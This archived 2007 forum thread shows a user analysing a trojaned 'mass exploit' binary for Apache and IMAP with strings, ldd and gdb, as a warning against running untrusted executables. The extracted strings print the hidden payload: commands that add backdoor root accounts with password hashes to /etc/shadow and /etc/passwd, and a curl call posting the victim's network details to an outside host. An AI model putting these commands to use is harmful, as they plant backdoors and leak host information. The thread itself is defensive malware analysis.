nV News Forums


nV News Forums (http://www.nvnews.net/vbulletin/index.php)
-   Networking And Security (http://www.nvnews.net/vbulletin/forumdisplay.php?f=58)
-   -   Watch what you trust. (http://www.nvnews.net/vbulletin/showthread.php?t=97428)

evilghost 08-28-07 11:56 AM

Watch what you trust.
This event struck me as unusual so I wanted to share with you why it's normal to be paranoid.

While reading up on my RSS security feeds I found a notification about exploitation of Apache/IMAP, with a link on Security Focus.


The grammatic structure of the message appears odd to say the least. Checking out the site there are two gzipped tarballs available for download. One includes the source code as well as a binary, the other is just precompiled binaries.

I wanted to show you how you can use the 'strings' command and 'ldd' to find information about an executable. Before you run an untrusted executable, especially as root, you better know for darn sure what it is.

ldd will list libraries a dynamic executable is compiled against, in this case, the executable wasn't statically compiled.


luser@meowbox:~/Desktop$ ldd massxpl
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e10000)
        /lib/ld-linux.so.2 (0xb7f4f000)

Now, look what strings has to say:


luser@meowbox:~/Desktop$ strings massxpl
Mass Xploitz for Apache and Imap
Apache mod_j/k Fedora Core 6/5 - Debian 3.1 - FreeBSD 5.4REL
Gnu mailutils imap4d Fedora Core 6 - Fedora Core 3
Attacking IMAP server on %s...
Press CTRL+C if you want to skip exploit
./xpl/imapfc3 -h %s
Attacking apache server on %s...
./xpl/apache -t 0 -h %s
perl ./xpl/apache.pl %s 1
./xpl/apache -t 1 -h %s
perl ./xpl/apache.pl %s 2
./xpl/apache -t 2 -h %s
perl ./xpl/apache.pl %s 3
./xpl/apache -t 3 -h %s
socket creation error
can not find host
[ %s ] Port %d (TCP) tertutup
[ %s ] Port %d (TCP) terbuka
Checking for banner...
Root priviledge is needed - use your root user OK!
Rename your target list filename to target.txt
echo toor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadowecho newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow
echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd
echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd
/usr/bin/curl -d "user=newbie&pass=novice&target=$(ifconfig -a)" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null
Trying to connect to %s port %d

As you can plainly see, the binary wants you to run it as root. When you do, it adds two new users to your /etc/shadow file (newbie and toor) and then to your /etc/password file. It then connects to a HTTP server using curl and reports your IP addresses so the malware author can then come back and connect to you. (http://www.trancefix.org/hell/save.php)

This is poor quality code. Several assumptions are made. Curl exists on the system and ifconfig will return a non IANA reserved address.

Either way, this should serve as a wake up call, malware authors are everywhere, and they're actively trying to compromise your box. If you're not taking necessary caution you'll get owned.

Even if you don't know C read the source code, unless it's marvelously obfuscated, you should be able to pick out oddities. Don't trust precompiled binaries from untrusted sources.

spaceigg 08-28-07 12:11 PM

Re: Watch what you trust.
interesting. thanks for educating us

evilghost 08-28-07 12:13 PM

Re: Watch what you trust.
You can also use gdb (GNU Debugger) to analyze the executable.

Run "gdb"
Type "file /path/to/massxpl"
Type "disass main" to run the disassembler on the application

Look for the movl calls, they occur around 0x80494e0 and 0x8049534

Type "x/s [address]" and you'll see:


(gdb) x/s 0x80494e0
0x80494e0 <__dso_handle+816>:    "echo toor:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>:    "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"

evilghost 08-28-07 12:21 PM

Re: Watch what you trust.
When disassembling, these are the things to look for, note the system calls:


0x08048feb <main+262>:  call  0x8048628 <system@plt>
0x08048ff0 <main+267>:  movl  $0x8049534,(%esp)
0x08048ff7 <main+274>:  call  0x8048628 <system@plt>
0x08048ffc <main+279>:  movl  $0x8049588,(%esp)
0x08049003 <main+286>:  call  0x8048628 <system@plt>
0x08049008 <main+291>:  movl  $0x80495bc,(%esp)
0x0804900f <main+298>:  call  0x8048628 <system@plt>
0x08049014 <main+303>:  movl  $0x8049468,0x4(%esp)

And now, what they do:


(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>:  "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>:    "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049588
0x8049588 <__dso_handle+984>:    "echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd"
(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>:  "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x804960c
0x804960c <__dso_handle+1116>:  "/usr/bin/curl -d \"user=newbie&pass=novice&target=$(ifconfig -a)\" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null"

evilghost 08-28-07 01:14 PM

Re: Watch what you trust.
You can also use gdb to list the functions of the program and then disassemble and inspect certain aspects of that function.


(gdb) info functions
All defined functions:

Non-debugging symbols:
0x080485d0  _init
0x080485f8  close@plt
0x08048608  select@plt
0x08048618  bcopy@plt
0x08048628  system@plt
0x08048638  puts@plt
0x08048648  getpeername@plt
0x08048658  fgets@plt
0x08048668  strstr@plt
0x08048678  __libc_start_main@plt
0x08048688  printf@plt
0x08048698  getuid@plt
0x080486a8  fcntl@plt
0x080486b8  fclose@plt
0x080486c8  snprintf@plt
0x080486d8  gethostbyname@plt
0x080486e8  exit@plt
0x080486f8  send@plt
0x08048708  htons@plt
0x08048718  memset@plt
---Type <return> to continue, or q <return> to quit---
0x08048728  connect@plt
0x08048738  fopen@plt
0x08048748  recv@plt
0x08048758  socket@plt
0x08048768  __gmon_start__@plt
0x08048780  _start
0x080487a4  call_gmon_start
0x080487d0  __do_global_dtors_aux
0x08048800  frame_dummy
0x08048824  promosi
0x08048850  imapattack
0x080488a7  apacheattack
0x08048ac8  ctimeout
0x08048ca0  bannertest
0x08048ee5  main
0x08049104  __libc_csu_fini
0x0804910c  __libc_csu_init
0x08049160  __do_global_ctors_aux
0x0804918c  _fini
(gdb) disass fopen
No symbol table is loaded.  Use the "file" command.
(gdb) disass fopen\@plt
No symbol table is loaded.  Use the "file" command.
(gdb) disass promosi
Dump of assembler code for function promosi:
0x08048824 <promosi+0>: push  %ebp
0x08048825 <promosi+1>: mov    %esp,%ebp
0x08048827 <promosi+3>: sub    $0x8,%esp
0x0804882a <promosi+6>: movl  $0x80491b4,(%esp)
0x08048831 <promosi+13>:        call  0x8048638 <puts@plt>
0x08048836 <promosi+18>:        movl  $0x80491d8,(%esp)
0x0804883d <promosi+25>:        call  0x8048638 <puts@plt>
0x08048842 <promosi+30>:        movl  $0x8049218,(%esp)
0x08048849 <promosi+37>:        call  0x8048638 <puts@plt>
0x0804884e <promosi+42>:        leave
0x0804884f <promosi+43>:        ret
End of assembler dump.
(gdb) x/s 0x80491d8
0x80491d8 <__dso_handle+40>:    "Apache mod_j/k Fedora Core 6/5 - Debian 3.1 - FreeBSD 5.4REL"
(gdb) x/s 0x8049218
0x8049218 <__dso_handle+104>:    "Gnu mailutils imap4d Fedora Core 6 - Fedora Core 3\n\n"

wnd 09-04-07 06:31 AM

Re: Watch what you trust.
Somehow your post reminded me about Ken Thompson's article on Reflections on Trusting Trust. "The moral is obvious. You can't trust code that you did not totally create yourself."

All times are GMT -5. The time now is 10:07 PM.

Powered by vBulletin® Version 3.7.1
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
Copyright 1998 - 2014, nV News.